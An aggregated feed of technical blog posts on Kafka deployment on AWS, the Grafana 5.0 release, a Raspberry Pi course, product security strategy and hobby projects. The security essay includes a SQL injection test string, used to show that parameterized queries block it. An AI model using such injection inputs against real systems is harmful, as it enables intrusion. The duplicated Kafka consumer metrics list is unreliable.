  • Data stored on EBS is persisted in case of an instance failure or termination. The broker’s data stored on an EBS volume remains intact, and you can mount the EBS volume to a new EC2 instance. Most of the replicated data for the replacement broker is already available in the EBS volume and need not be copied over the network from another broker. Only the changes made after the original broker failure need to be transferred across the network. That makes this process much faster.



Intuit chose EBS because of their frequent instance restacking requirements and also other benefits provided by EBS.

Generally, Kafka deployments use a replication factor of three. EBS offers replication within its service, so Intuit chose a replication factor of two instead of three.

Instance types

The choice of instance types is generally driven by the type of storage required for your streaming applications on a Kafka cluster. If your application requires ephemeral storage, h1, i3, and d2 instances are your best option.

Intuit used r3.xlarge instances for their brokers and r3.large for ZooKeeper, with ST1 (throughput optimized HDD) EBS for their Kafka cluster.

Here are sample benchmark numbers from Intuit tests.

Configuration:
  • r3.xlarge
  • ST1 EBS
  • 12 brokers
  • 12 partitions

Broker bytes (MB/s): 346.9 aggregate

If you need EBS storage, then AWS has a newer-generation r4 instance. The r4 instance is superior to R3 in many ways:

  • It has a faster processor (Broadwell).
  • EBS is optimized by default.
  • It features networking based on Elastic Network Adapter (ENA), with up to 10 Gbps on smaller sizes.
  • It costs 20 percent less than R3.

Note: It’s always best practice to check for the latest changes in instance types.


Networking

The network plays a very important role in a distributed system like Kafka. A fast and reliable network ensures that nodes can communicate with each other easily. The available network throughput controls the maximum amount of traffic that Kafka can handle. Network throughput, combined with disk storage, is often the governing factor for cluster sizing.

If you expect your cluster to receive high read/write traffic, select an instance type that offers 10-Gb/s performance.

In addition, choose an option that keeps interbroker network traffic on the private subnet, because this approach allows clients to connect to the brokers. Communication between brokers and clients uses the same network interface and port. For more details, see the documentation about IP addressing for EC2 instances.

If you are deploying in more than one AWS Region, you can connect the two VPCs in the two AWS Regions using cross-region VPC peering. However, be aware of the networking costs associated with cross-AZ deployments.


Upgrades

Kafka has a history of not being backward compatible, but its support of backward compatibility is getting better. During a Kafka upgrade, you should keep your producer and consumer clients on a version equal to or lower than the version you are upgrading from. After the upgrade is finished, you can start using a new protocol version and any new features it supports. There are three upgrade approaches available, discussed following.

Rolling or in-place upgrade

In a rolling or in-place upgrade scenario, upgrade one Kafka broker at a time. Take into consideration the recommendations for doing rolling restarts to avoid downtime for end users.

Downtime upgrade

If you can afford the downtime, you can take your entire cluster down, upgrade each Kafka broker, and then restart the cluster.

Blue/green upgrade

Intuit followed the blue/green deployment model for their workloads, as described following.

If you can afford to create a separate Kafka cluster and upgrade it, we highly recommend the blue/green upgrade scenario. In this scenario, we recommend that you keep your clusters up-to-date with the latest Kafka version. For additional details on Kafka version upgrades or more details, see the Kafka upgrade documentation.

The following illustration shows a blue/green upgrade.

In this scenario, the upgrade plan works like this:

  • Create a new Kafka cluster on AWS.
  • Create a new Kafka producers stack to point to the new Kafka cluster.
  • Create topics on the new Kafka cluster (see the sketch after this list).
  • Test the green deployment end to end (sanity check).
  • Using Amazon Route 53, change the new Kafka producers stack on AWS to point to the new green Kafka environment that you have created.
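For the topic-creation step above, a minimal sketch using the tooling that ships with Kafka; the ZooKeeper address, topic name, and counts are placeholders that you would adapt to your green cluster:
# Create a topic on the new (green) cluster; match the partition count and
# replication factor of the corresponding topic on the old cluster
kafka-topics.sh --create \
  --zookeeper <green-zookeeper-host>:2181 \
  --topic <topic-name> \
  --partitions 12 \
  --replication-factor 3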

The roll-back plan works like this:

  • Switch Amazon Route 53 to the old Kafka producers stack on AWS to point to the old Kafka environment.

For additional details on blue/green deployment architecture using Kafka, see the re:Invent presentation Leveraging the Cloud with a Blue-Green Deployment Architecture.

Performance tuning

You can tune Kafka performance in multiple dimensions. Following are some best practices for performance tuning.

 These are some general performance tuning techniques:

  • If throughput is less than network capacity, try the following:
    • Add more threads
    • Increase batch size
    • Add more producer instances
    • Add more partitions
  • To improve latency when acks = -1, increase your num.replica.fetchers value (a sketch of broker-side settings like this follows the list).
  • For cross-AZ data transfer, tune your buffer settings for sockets and for OS TCP.
  • Make sure that num.io.threads is greater than the number of disks dedicated for Kafka.
  • Adjust num.network.threads based on the number of producers plus the number of consumers plus the replication factor.
  • Your message size affects your network bandwidth. To get higher performance from a Kafka cluster, select an instance type that offers 10 Gb/s performance.
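For the broker-side settings mentioned in the list above, here is a minimal sketch of overrides in server.properties; the file path and the values are illustrative starting points rather than recommendations for your workload:
# Append illustrative tuning overrides to the broker configuration
cat >> /opt/kafka/config/server.properties <<'EOF'
num.replica.fetchers=4
num.io.threads=8
num.network.threads=5
socket.send.buffer.bytes=1048576
socket.receive.buffer.bytes=1048576
EOF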

For Java and JVM tuning, try the following:

  • Minimize GC pauses by using the Oracle JDK, which uses the new G1 garbage-first collector.
  • Try to keep the Kafka heap size below 4 GB.


Monitoring

Knowing whether a Kafka cluster is working correctly in a production environment is critical. Sometimes, just knowing that the cluster is up is enough, but Kafka applications have many moving parts to monitor. In fact, it can easily become confusing to understand what’s important to watch and what you can set aside. Items to monitor range from simple metrics about the overall rate of traffic, to producers, consumers, brokers, controller, ZooKeeper, topics, partitions, messages, and so on.

For monitoring, Intuit used several tools, including New Relic, Wavefront, Amazon CloudWatch, and AWS CloudTrail. Our recommended monitoring approach follows.

For system metrics, we recommend that you monitor:

  • CPU load
  • Network metrics
  • File handle usage
  • Disk space
  • Disk I/O performance
  • Garbage collection
  • ZooKeeper

For producers, we recommend that you monitor:

  • Batch-size-avg
  • Compression-rate-avg
  • Waiting-threads
  • Buffer-available-bytes
  • Record-queue-time-max
  • Record-send-rate
  • Records-per-request-avg

For consumers, we recommend that you monitor:

  • Batch-size-avg
  • Compression-rate-avg
  • Waiting-threads
  • Buffer-available-bytes
  • Record-queue-time-max
  • Record-send-rate
  • Records-per-request-avg


Security

Like most distributed systems, Kafka provides the mechanisms to transfer data with relatively high security across the components involved. Depending on your setup, security might involve different services such as encryption, Kerberos, Transport Layer Security (TLS) certificates, and advanced access control list (ACL) setup in brokers and ZooKeeper. The following tells you more about the Intuit approach. For details on Kafka security not covered in this section, see the Kafka documentation.

Encryption at rest

For EBS-backed EC2 instances, you can enable encryption at rest by using Amazon EBS volumes with encryption enabled. Amazon EBS uses AWS Key Management Service (AWS KMS) for encryption. For more details, see Amazon EBS Encryption in the EBS documentation. For instance store–backed EC2 instances, you can enable encryption at rest by using Amazon EC2 instance store encryption.
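As a quick illustration, an encrypted EBS volume can be created with the AWS CLI; the Availability Zone, size, and volume type shown here are placeholders, and AWS KMS uses your default EBS key unless you pass --kms-key-id:
# Create an encrypted ST1 volume for a Kafka broker's log directory
aws ec2 create-volume \
  --availability-zone us-east-1a \
  --size 500 \
  --volume-type st1 \
  --encrypted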

Encryption in transit

Kafka uses TLS for client and internode communications.
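A minimal sketch of the broker-side TLS settings in server.properties; the listener address, file paths, and passwords are placeholders, and the exact set of options you need depends on your setup (see the Kafka security documentation):
cat >> /opt/kafka/config/server.properties <<'EOF'
# Accept TLS client connections and use TLS between brokers
listeners=SSL://0.0.0.0:9093
security.inter.broker.protocol=SSL
ssl.keystore.location=/etc/kafka/ssl/broker.keystore.jks
ssl.keystore.password=<keystore-password>
ssl.key.password=<key-password>
ssl.truststore.location=/etc/kafka/ssl/broker.truststore.jks
ssl.truststore.password=<truststore-password>
EOF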


Authentication

Authentication of connections to brokers, from clients (producers and consumers), other brokers, and tools, uses either Secure Sockets Layer (SSL) or Simple Authentication and Security Layer (SASL).

Kafka supports Kerberos authentication. If you already have a Kerberos server, you can add Kafka to your current configuration.


Authorization

In Kafka, authorization is pluggable and integration with external authorization services is supported.

Backup and restore

The type of storage used in your deployment dictates your backup and restore strategy.

The best way to back up a Kafka cluster based on instance storage is to set up a second cluster and replicate messages using MirrorMaker. Kafka’s mirroring feature makes it possible to maintain a replica of an existing Kafka cluster. Depending on your setup and requirements, your backup cluster might be in the same AWS Region as your main cluster or in a different one.

For EBS-based deployments, you can enable automatic snapshots of EBS volumes to back up volumes. You can easily create new EBS volumes from these snapshots to restore. We recommend storing backup files in Amazon S3.
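For example, a one-off snapshot of a broker’s EBS volume can be taken with the AWS CLI; the volume ID is a placeholder, and in practice you would schedule snapshots rather than run them by hand:
# Snapshot the EBS volume that holds the broker's Kafka log directory
aws ec2 create-snapshot \
  --volume-id <volume-id> \
  --description "Kafka broker log volume backup"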

For more information on how to back up in Kafka, see the Kafka documentation.


In this post, we discussed several patterns for running Kafka in the AWS Cloud. AWS also provides an alternative managed solution, Amazon Kinesis Data Streams: there are no servers to manage or scaling cliffs to worry about, you can scale the size of your streaming pipeline in seconds without downtime, data replication across Availability Zones is automatic, you benefit from security out of the box, and Kinesis Data Streams is tightly integrated with a wide variety of AWS services like Lambda, Redshift, and Elasticsearch, while also supporting open-source frameworks like Storm, Spark, and Flink. You may also want to look at the kafka-kinesis connector.

If you have questions or suggestions, please comment below.

Additional Reading

If you found this post useful, be sure to check out Implement Serverless Log Analytics Using Amazon Kinesis Analytics and Real-time Clickstream Anomaly Detection with Amazon Kinesis Analytics.

About the Author

Prasad Alle is a Senior Big Data Consultant with AWS Professional Services. He spends his time leading and building scalable, reliable Big data, Machine learning, Artificial Intelligence and IoT solutions for AWS Enterprise and Strategic customers. His interests extend to various technologies such as Advanced Edge Computing, Machine learning at Edge. In his spare time, he enjoys spending time with his family.



Grafana v5.0 Released

Post Syndicated from Blogs on Grafana Labs Blog original https://grafana.com/blog/2018/03/01/grafana-v5.0-released/

v5.0 Stable Released

We have been working on Grafana v5 for most of 2017 and it’s finally ready! This release is important
in a different way than previous releases, as the main focus has been on improving the core Grafana features and attributes.
That means vastly improved UX and page design, easier and more flexible dashboard building enabled by a
new grid layout system. Better support for large installations with the addition of Dashboard Folders, Teams and Permissions.
Improvements to provisioning/cloud-native setups by making datasources & dashboards configurable from files.

This is the most substantial update that Grafana has ever seen.

Download Grafana 5.0 Now

What’s New in Grafana v5.0

Video showing new features

New Dashboard Layout Engine

The new dashboard layout engine allows for much easier movement and sizing of panels, as other panels now move out of the way in
a very intuitive way. Panels are sized independently, so rows are no longer necessary to create layouts. This opens
up many new types of layouts where panels of different heights can be aligned easily. Check out the new grid in the video
above or on the play site. All your existing dashboards will automatically migrate to the
new position system and look close to identical. The new panel position makes dashboards saved in v5.0 incompatible
with older versions of Grafana.

New UX

Almost every page has seen significant UX improvements. All pages (except dashboard pages) have a new tab-based layout that improves navigation between pages. The side menu has also changed quite a bit. You can still hide the side menu completely if you click on the Grafana logo.

Dashboard Settings

Dashboard pages have a new header toolbar where buttons and actions are now all moved to the right. All the dashboard
settings views have been combined with a side nav which allows you to easily move between different setting categories.

New Light Theme

This theme has not seen a lot of love in recent years and we felt it was time to give it a major overhaul. We are very happy with the result.

Dashboard Folders

The big new feature that comes with Grafana v5.0 is dashboard folders. Now you can organize your dashboards in folders,
which is very useful if you have a lot of dashboards or multiple teams.

  • New search design adds expandable sections for each folder, starred and recently viewed dashboards.
  • New manage dashboard pages enable batch actions and views for folder settings and permissions.
  • Set permissions on folders and have dashboards inherit the permissions.


Teams

A team is a new concept in Grafana v5: simply a group of users that can be used in the new permission system for dashboards and folders. Only an admin can create teams.
We hope to do more with teams in future releases like integration with LDAP and a team landing page.


Permissions

You can assign permissions to folders and dashboards. The default user role-based permissions can be removed and
replaced with specific teams or users, enabling more control over what a user can see and edit.

Dashboard permissions only limit which dashboards & folders a user can view & edit, not which
data sources a user can access or what queries a user can issue.

Provisioning from configuration

In previous versions of Grafana, you could only use the HTTP API for provisioning data sources and dashboards.
But that required the service to be running before you started creating dashboards, and you also needed to
set up credentials for the API. In v5.0 we decided to improve this experience by adding a new active
provisioning system that uses config files. This makes a GitOps workflow more natural, as data sources and dashboards can
be defined in files that can be version controlled. We hope to later extend this system with support for users, orgs,
and alerts as well.

Data sources

Data sources can now be set up using config files. Data sources created this way are not editable from the Grafana GUI by default.
It’s also possible to update and delete data sources from the config file. More info in the data source provisioning docs.
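
As a minimal illustration of the idea (the file path and data source values below are assumptions for the example, not part of the release notes), a provisioning file for a Prometheus data source could be generated like this:

    from pathlib import Path
    from textwrap import dedent

    # Grafana v5 reads provisioning files from its provisioning directory on
    # startup; the path below matches a typical package install, adjust as needed.
    datasource_yaml = dedent("""\
        apiVersion: 1
        datasources:
          - name: Prometheus          # display name shown in the Grafana UI
            type: prometheus          # data source plugin id
            access: proxy
            url: http://localhost:9090
            isDefault: true
        """)

    target = Path("/etc/grafana/provisioning/datasources/prometheus.yaml")
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_text(datasource_yaml)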


We also deprecated the [dashboard.json] feature in favor of our new dashboard provisioner, which keeps dashboards on disk
in sync with dashboards in Grafana’s database. The dashboard provisioner has multiple advantages over the old
[dashboard.json] feature. Instead of keeping the dashboard in memory, we now insert it into the database,
which makes it possible to star dashboards, use one as the home dashboard, set permissions, and use other Grafana features that
expect dashboards to exist in the database. More info in the dashboard provisioning docs.
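
And a matching sketch for the dashboard provisioner (again, the paths and names are illustrative assumptions): a provider file points Grafana at a directory of dashboard JSON files, which it then keeps in sync with its database.

    from pathlib import Path
    from textwrap import dedent

    # A dashboard provider: Grafana scans the configured directory and loads
    # every dashboard .json file it finds into the database.
    provider_yaml = dedent("""\
        apiVersion: 1
        providers:
          - name: default
            orgId: 1
            folder: ''
            type: file
            options:
              path: /var/lib/grafana/dashboards
        """)

    target = Path("/etc/grafana/provisioning/dashboards/default.yaml")
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_text(provider_yaml)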

Graphite Tags & Integrated Function Docs

The Graphite query editor has been updated to support the latest Graphite version (v1.1) that adds
many new functions and support for querying by tags. You can now also view function documentation right in the query editor!

Read more on Graphite Tag Support.
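
For a sense of what querying by tags looks like from code, here is a sketch under assumptions: the Graphite host, tag names, and time range are made up, though seriesByTag and the /render endpoint are standard Graphite 1.1 features.

    import json
    import urllib.parse
    import urllib.request

    GRAPHITE = "http://graphite.example.com"   # assumption: your Graphite host

    # seriesByTag() selects series by tag expressions instead of dotted paths.
    params = urllib.parse.urlencode({
        "target": "seriesByTag('name=cpu.load', 'datacenter=dc1')",
        "from": "-1h",
        "format": "json",
    })

    with urllib.request.urlopen(f"{GRAPHITE}/render?{params}") as resp:
        for series in json.load(resp):
            print(series["target"], "-", len(series["datapoints"]), "points")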


Check out the CHANGELOG.md file for a complete list
of new features, changes, and bug fixes.


Head to the download page for download links and instructions.


A big thanks to all the Grafana users who contribute by submitting PRs, bug reports & feedback!

Transition from Scratch to Python with FutureLearn

Post Syndicated from Dan Fisher original https://www.raspberrypi.org/blog/futurelearn-scratch-to-python/

With the launch of our first new free online course of 2018 — Scratch to Python: Moving from Block- to Text-based Programming — two weeks away, I thought this would be a great opportunity to introduce you to the ins and outs of the course content so you know what to expect.

FutureLearn: Moving from Scratch to Python

Learn how to apply the thinking and programming skills you’ve learnt in Scratch to text-based programming languages like Python.

Take the plunge into text-based programming

The idea for this course arose from our conversations with educators who had set up a Code Club in their schools. Most people start a club by teaching Scratch, a block-based programming language, because it allows learners to drag and drop blocks of pre-written code into a window to create a program. The blocks automatically snap together, making it easy to build fun and educational projects that don’t require much troubleshooting. You can do almost anything a beginner could wish for with Scratch, even physical computing to control LEDs, buzzers, buttons, motors, and more!

Scratch to Python FutureLearn Raspberry Pi

However, on our face-to-face training programme Picademy, educators told us that they were finding it hard to engage children who had outgrown Scratch and needed a new challenge. It was easy for me to imagine: a young learner, who once felt confident about programming using Scratch, is now confused by the alien, seemingly awkward interface of Python. What used to take them minutes in Scratch now takes them hours to code, and they start to lose interest — not a good result, I’m sure you’ll agree. I wanted to help educators to navigate this period in their learners’ development, and so I’ve written a course that shows you how to take the programming and thinking skills you and your learners have developed in Scratch, and apply them to Python.

Scratch to Python FutureLearn Raspberry Pi

Who is the course for?

Educators from all backgrounds who are working with secondary school-aged learners. It will also be interesting to anyone who has spent time working with Scratch and wants to understand how programming concepts translate between different languages.

“It was great fun, and I thought that the ideas and resources would be great to use with Year 7 classes.”
Sue Grey, Classroom Teacher

What is covered?

After showing you the similarities and differences of Scratch and Python, and how the skills learned using one can be applied to the other, we will look at turning more complex Scratch scripts into Python programs. Through creating a Mad Libs game and developing a username generator, you will see how programs can be simplified in a text-based language. We will give you our top tips for debugging Python code, and you’ll have the chance to share your ideas for introducing more complex programs to your students.
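
To give a flavour of the kind of translation involved (this snippet is my own illustration rather than the course material), a Mad Libs-style game that takes a stack of “ask and wait” and “join” blocks in Scratch becomes just a few lines of Python:

    # Ask for a few words, then drop them into a story template.
    adjective = input("Give me an adjective: ")
    animal = input("Give me an animal: ")
    verb = input("Give me a verb: ")

    print(f"The {adjective} {animal} loved to {verb} every single morning.")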

Scratch to Python FutureLearn Raspberry Pi

After that, we will look at different data types in Python and write a script to calculate how old you are in dog years. Finally, you’ll dive deeper into the possibilities of Python by installing and using external Python libraries to perform some amazing tasks.
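
For example (again a sketch of mine, not the course’s exact exercise), the dog years script is a neat way to meet strings, numbers, and type conversion in one go:

    # input() returns a string, so we must convert it before doing arithmetic --
    # which is exactly where Python's data types become visible to learners.
    age = float(input("How old are you? "))
    dog_years = age * 7          # the traditional (if unscientific) ratio
    print(f"You are about {dog_years:.1f} in dog years.")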

By the end of the course, you’ll be able to:

  • Transfer programming and thinking skills from Scratch to Python
  • Use fundamental Python programming skills
  • Identify errors in your Python code based on error messages, and debug your scripts
  • Produce tools to support students’ transition from block-based to text-based programming
  • Understand the power of text-based programming and what you can create with it

Where can I sign up?

The free four-week course starts on 12 March 2018, and you can sign up now on FutureLearn. While you’re there, be sure to check out our other free courses, such as Prepare to Run a Code Club, Teaching Physical Computing with a Raspberry Pi and Python, and our second new course Build a Makerspace for Young People — more information on it will follow in tomorrow’s blog post.

The post Transition from Scratch to Python with FutureLearn appeared first on Raspberry Pi.

Getting product security engineering right

Post Syndicated from Michal Zalewski original http://lcamtuf.blogspot.com/2018/02/getting-product-security-engineering.html

Product security is an interesting animal: it is a uniquely cross-disciplinary endeavor that spans policy, consulting,
process automation, in-depth software engineering, and cutting-edge vulnerability research. And in contrast to many
other specializations in our field of expertise – say, incident response or network security – we have virtually no
time-tested and coherent frameworks for setting it up within a company of any size.

In my previous post, I shared some thoughts
on nurturing technical organizations and cultivating the right kind of leadership within. Today, I figured it would
be fitting to follow up with several notes on what I learned about structuring product security work – and about actually
making the effort count.

The “comfort zone” trap

For security engineers, knowing your limits is a sought-after quality: there is nothing more dangerous than a security
expert who goes off script and starts dispensing authoritative-sounding but bogus advice on a topic they know very
little about. But that same quality can be destructive when it prevents us from growing beyond our most familiar role: that of
a critic who pokes holes in other people’s designs.

The role of a resident security critic lends itself all too easily to a sense of supremacy: the mistaken
belief that our cognitive skills exceed the capabilities of the engineers and product managers who come to us for help
– and that the cool bugs we file are the ultimate proof of our special gift. We start taking pride in the mere act
of breaking somebody else’s software – and then write scathing but ineffectual critiques addressed to executives,
demanding that they either put a stop to a project or sign off on a risk. And hey, in the latter case, they better
brace for our triumphant “I told you so” at some later date.

Of course, escalations of this type have their place, but they need to be a very rare sight; when practiced routinely, they are a telltale
sign of a dysfunctional team. We might be failing to think up viable alternatives that are in tune with business or engineering needs; we might
be very unpersuasive, failing to communicate with other rational people in a language they understand; or it might be that our tolerance for risk
is badly out of whack with the rest of the company. Whatever the cause, I’ve seen high-level escalations where the security team
spoke of valiant efforts to resist inexplicably awful design decisions or data sharing setups; and where product leads in turn talked about
pressing business needs randomly blocked by obstinate security folks. Sometimes, simply having them compare their notes would be enough to arrive
at a technical solution – such as sharing a less sensitive subset of the data at hand.

To be effective, any product security program must be rooted in a partnership with the rest of the company, focused on helping them get stuff done
while eliminating or reducing security risks. To combat the toxic us-versus-them mentality, I found it helpful to have some team members with
software engineering backgrounds, even if that just means ownership of a small open-source project. This can broaden our horizons, helping us see
that we all make the same mistakes – and that not every solution that sounds good on paper is usable once we code it up.

Getting off the treadmill

All security programs involve a good chunk of operational work. For product security, this can be a combination of product launch reviews, design consulting requests, incoming bug reports, or compliance-driven assessments of some sort. And curiously, such reactive work also has the property of gradually expanding to consume all the available resources on a team: next year is bound to bring even more review requests, even more regulatory hurdles, and even more incoming bugs to triage and fix.

Being more tractable, such routine tasks are also more readily enshrined in SDLs, SLAs, and all kinds of other official documents that are often mistaken for a mission statement that justifies the existence of our teams. Soon, instead of explaining to a developer why they should fix a particular problem right away, we end up pointing them to page 17 in our severity classification guideline, which defines that “severity 2” vulnerabilities need to be resolved within a month. Meanwhile, another policy may be telling them that they need to run a fuzzer or a web application scanner for a particular number of CPU-hours – no matter whether it makes sense or whether the job is set up right.

To run a product security program that scales sublinearly, stays abreast of future threats, and doesn’t erect bureaucratic speed bumps just for the sake of it, we need to recognize this inherent tendency for operational work to take over – and we need to rein it in. No matter what last year’s policy says, we usually don’t need to be doing security reviews with a particular cadence or to a particular depth; if we need to scale them back 10% to staff a two-quarter project that fixes an important API and squashes an entire class of bugs, it’s a short-term risk we should feel empowered to take.

As noted in my earlier post, I find contingency planning to be a valuable tool in this regard: why not ask ourselves how the team would cope if the workload went up another 30%, but bad financial results precluded any team growth? It’s actually fun to think about such hypotheticals ahead of time – and hey, if the ideas sound good, why not try them out today?

Living for a cause

It can be difficult to understand if our security efforts are structured and prioritized right; when faced with such uncertainty, it is natural to stick to the safe fundamentals – investing most of our resources into the very same things that everybody else in our industry appears to be focusing on today.

I think it’s important to combat this mindset – and if so, we might as well tackle it head on. Rather than focusing on tactical objectives and policy documents, try to write down a concise mission statement explaining why you are a team in the first place, what specific business outcomes you are aiming for, how you prioritize them, and how you want it all to change in a year or two. It should be a fluid narrative that reads right and that everybody on your team can take pride in; my favorite way of starting the conversation is telling folks that we could always have a new VP tomorrow – and that the VP’s first order of business could be asking, “why do you have so many people here and how do I know they are doing the right thing?”. It’s a playful but realistic framing device that motivates people to get it done.

In general, a comprehensive product security program should probably start with the assumption that no matter how many resources we have at our disposal, we will never be able to stay in the loop on everything that’s happening across the company – and even if we did, we’re not going to be able to catch every single bug. It follows that one of our top priorities for the team should be making sure that bugs don’t happen very often; a scalable way of getting there is equipping engineers with intuitive and usable tools that make it easy to perform common tasks without having to worry about security at all. Examples include standardized, managed containers for production jobs; safe-by-default APIs, such as strict contextual autoescaping for XSS or type safety for SQL; security-conscious style guidelines; or plug-and-play libraries that take care of common crypto or ACL enforcement tasks.
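
To make the “safe-by-default API” point concrete, here is a small illustration of the SQL case in Python (my example, not the author’s): the parameterized form removes the injection-prone string concatenation instead of relying on every engineer to remember to escape inputs.

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'alice@example.com')")

    user_input = "alice' OR '1'='1"   # a classic injection attempt

    # Risky pattern: building the query by string concatenation.
    # conn.execute("SELECT email FROM users WHERE name = '" + user_input + "'")

    # Safe-by-default pattern: the driver treats the value strictly as data.
    rows = conn.execute("SELECT email FROM users WHERE name = ?", (user_input,))
    print(rows.fetchall())   # [] -- the injection attempt matches no rows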

Of course, not all problems can be addressed at the framework level, and not every engineer will always reach for the right tools. Because of this, the next principle that I found to be worth focusing on is containment and mitigation: making sure that bugs are difficult to exploit when they happen, or that the damage is kept in check. The solutions in this space can range from low-level enhancements (say, hardened allocators or seccomp-bpf sandboxes) to client-facing features such as browser origin isolation or Content Security Policy.
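
As one concrete and deliberately minimal illustration of the containment idea, here is a stdlib-only sketch of serving every response with a restrictive Content-Security-Policy header; the policy string is an assumption for the example, not a recommendation for any particular product.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    # A restrictive policy: only same-origin resources, no plugins, no <base> tricks.
    CSP = "default-src 'self'; object-src 'none'; base-uri 'none'"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            body = b"<h1>hello</h1>"
            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            self.send_header("Content-Security-Policy", CSP)  # containment layer
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    if __name__ == "__main__":
        HTTPServer(("127.0.0.1", 8000), Handler).serve_forever()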

The usual consulting, review, and outreach tasks are an important facet of a product security program, but probably shouldn’t be the sole focus of your team. It’s also best to avoid undue emphasis on vulnerability showmanship: while valuable in some contexts, it creates a hypercompetitive environment that may be hostile to less experienced team members – not to mention, squashing individual bugs offers very limited value if the same issue is likely to be reintroduced into the codebase the next day. I like to think of security reviews as a teaching opportunity instead: it’s a way to raise awareness, form partnerships with engineers, and help them develop lasting habits that reduce the incidence of bugs. Metrics to understand the impact of your work are important, too; if your engagements are seen mostly as yet another layer of red tape, product teams will stop reaching out to you for advice.

The other tenet of a healthy product security effort requires us to recognize that, at scale and given enough time, every defense mechanism is bound to fail – and so, we need ways to prevent bugs from turning into incidents. The efforts in this space may range from developing product-specific signals for the incident response and monitoring teams; to offering meaningful vulnerability reward programs and nourishing a healthy and respectful relationship with the research community; to organizing regular offensive exercises in hopes of spotting bugs before anybody else does.

Oh, one final note: an important feature of a healthy security program is the existence of multiple feedback loops that help you spot problems without the need to micromanage the organization and without being deathly afraid of taking chances. For example, the data coming from bug bounty programs, if analyzed correctly, offers a wonderful way to alert you to systemic problems in your codebase – and later on, to measure the impact of any remediation and hardening work.

N-O-D-E’s always-on networked Pi Plug

Post Syndicated from Alex Bate original https://www.raspberrypi.org/blog/node-pi-plug/

N-O-D-E’s Pi Plug is a simple approach to using a Raspberry Pi Zero W as an always-on networked device without a tangle of wires.

Pi Plug 2: Turn The Pi Zero Into A Mini Server

Today I’m back with an update on the Pi Plug I made a while back. This prototype is still in the works, and is much more modular than the previous version. https://N-O-D-E.net/piplug2.html https://github.com/N-O-D-E/piplug

The Pi Zero Power Case

In a video early last year, YouTuber N-O-D-E revealed his Pi Zero Power Case, an all-in-one always-on networked computer that fits snugly against a wall power socket.

NODE Plug Raspberry Pi Plug

The project uses an official Raspberry Pi power supply, a Zero4U USB hub, and a Raspberry Pi Zero W, and it allows completely wireless connection to a network. N-O-D-E cut the power cord and soldered its wires directly to the power input of the USB hub. The hub powers the Zero via pogo pins that connect directly to the test pads beneath.

The Power Case is a neat project, but it may be a little daunting for anyone not keen on cutting and soldering the power supply wires.

Pi Plug 2

In his overhaul of the design, N-O-D-E has created a modular reimagining of his previous always-on networked computer. It sits more neatly against the wall socket and requires absolutely no soldering or hacking of physical hardware.

Pi Plug

The Pi Plug 2 uses a USB power supply alongside two custom PCBs and a Zero W. While one PCB houses a USB connector that slots directly into the power supply, two blobs of solder on the second PCB press against the test pads beneath the Zero W. When connected, the PCBs run power directly from the wall socket to the Raspberry Pi Zero W. Neat!

NODE Plug Raspberry Pi

While N-O-D-E isn’t currently selling these PCBs in his online store, all files are available on GitHub, so have a look if you want to recreate the Pi Plug.


In another video — and seriously, if you haven’t checked out N-O-D-E’s YouTube channel yet, you really should — he demonstrates a few changes that can turn your Zero into a USB dongle computer. This is a great hack if you don’t want to carry a power supply around in your pocket. As N-O-D-E explains:

Besides simply SSH’ing into the Pi, you could also easily install a remote desktop client and use the GUI. You can share your computer’s internet connection with the Pi and use it just like you would normally, but now without the need for a monitor, chargers, adapters, cables, or peripherals.

We’re keen to see how our community is hacking their Zeros and Zero Ws in order to take full advantage of the small footprint of the computer, so be sure to share your projects and ideas with us, either in the comments below or via social media.

The post N-O-D-E’s always-on networked Pi Plug appeared first on Raspberry Pi.

Weekly roundup: Lost time

Post Syndicated from Eevee original https://eev.ee/dev/2018/02/13/weekly-roundup-lost-time/

I ran out of brain pills near the end of January due to some regulatory kerfuffle, and spent something like a week and a half basically in a daze. I have incredibly a lot of stuff to do right now, too, so not great timing… but, well, I guess no time would be especially good. Oh well. I got a forced vacation and played some Avernum.

Anyway, in the last three weeks, the longest span I’ve ever gone without writing one of these:

  • anise: I added a ✨ completely new menu feature ✨ that looks super cool and amazing and will vastly improve the game.

  • blog: I wrote SUPER game night 3, featuring a bunch of games from GAMES MADE QUICK??? 2.0! It’s only a third of them though, oh my god, there were just so many.

    I also backfilled some release posts, including one for Strawberry Jam 2 — more on that momentarily.

  • ???: Figured out a little roadmap and started on an ???.

  • idchoppers: Went down a whole rabbit hole trying to port some academic C++ to Rust, ultimately so I could intersect arbitrary shapes, all so I could try out this ridiculous idea to infer the progression through a Doom map. This was kind of painful, and is basically the only useful thing I did while unmedicated. I might write about it.

  • misc: I threw together a little PICO-8 prime sieve inspired by this video. It’s surprisingly satisfying.

    (Hmm, does this deserve a release post? Where should its permanent home be? Argh.)

  • art: I started to draw my Avernum party but only finished one of them. I did finish a comic celebrating the return of my brain pills.

  • neon vn: I contributed some UI and bugfixing to a visual novel that’ll be released on Floraverse tomorrow.

  • alice vn: For Strawberry Jam 2, glip and I are making a ludicrously ambitious horny visual novel in Ren’Py. Turns out Ren’Py is impressively powerful, and I’ve been having a blast messing with it. But also our idea requires me to write about sixty zillion words by the end of the month. I guess we’ll see how that goes.

    I have a (NSFW) progress thread going on my smut alt, but honestly, most of the progress for the next week will be “did more writing”.

I’m behind again! Sorry. I still owe a blog post for last month, and a small project for last month, and now blog posts for this month, and Anise game is kinda in limbo, and I don’t know how any of this will happen with this huge jam game taking priority over basically everything else. I’ll see if I can squeeze other stuff in here and there. I intended to draw more regularly this month, too, but wow I don’t think I can even spare an hour a day.

The jam game is forcing me to do a lot of writing that I’d usually dance around and avoid, though, so I think I’ll come out the other side of it much better and faster and more confident.

Welp. Back to writing!

Preining: In memoriam Staszek Wawrykiewicz

Post Syndicated from ris original https://lwn.net/Articles/747123/rss

Norbert Preining reports
the sad news
that Staszek Wawrykiewicz has died. “Staszek was an
active member of the Polish TeX community, and an incredibly valuable TeX
Live Team member. His insistence and perseverance have saved TeX Live from
many disasters and bugs. Although I have been in contact with Staszek over
the TeX Live mailing lists since some years, I met him in person for the
first time on my first ever BachoTeX, the EuroBachoTeX 2007. His
friendliness, openness to all new things, his inquisitiveness, all took a
great place in my heart.” (Thanks to Paul Wise)

